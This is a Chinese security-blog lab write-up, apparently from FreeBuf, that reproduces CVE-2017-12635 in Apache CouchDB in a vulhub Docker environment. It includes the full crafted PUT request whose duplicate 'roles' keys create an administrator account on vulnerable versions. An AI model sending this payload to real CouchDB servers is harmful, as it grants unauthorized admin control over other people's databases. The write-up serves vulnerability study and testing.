freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CVE-2017-12635 Couchdb 垂直越权漏洞
2021-10-29 10:04:31

漏洞简介

Apache CouchDB是一个开源的NoSQL数据库,专一于易用性和成为“彻底拥抱web的数据库”。它是一个使用JSON做为数据存储格式,javascript做为查询语言,MapReduce和HTTP做为API的NoSQL数据库。

CVE-2017-12635:Erlang和JavaScript,对JSON解析方式的不同,导致语句执行产生差异性。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

利用条件

  1. 使用CouchDB数据库,开启5984端口
  2. 版本<1.7.0以及 <2.1.

漏洞复现

cd vulhub-master/couchdb/CVE-2017-12635/
docker-compose build
docker-compose up -d
图片.png

http://127.0.0.1:5984/

图片.png

http://127.0.0.1:5984/_utils/#login

图片.png
admin/admin抓包提示错误

图片.png

对请求包进行改造

`PUT /_users/org.couchdb.user:vulhub HTTP/1.1

Host: 192.168.183.134:5984

Accept: /

Accept-Language: en

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Connection: close

Content-Type: application/json

Content-Length: 112

{

"type": "user",

"name": "vulhub",

"roles": ["_admin"],

"roles":[],

"password": "vulhub111"

}`

图片.png

账号vulhub密码vulhub111进入登录页面

图片.png

# web安全 # 漏洞分析 # 网络安全技术
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者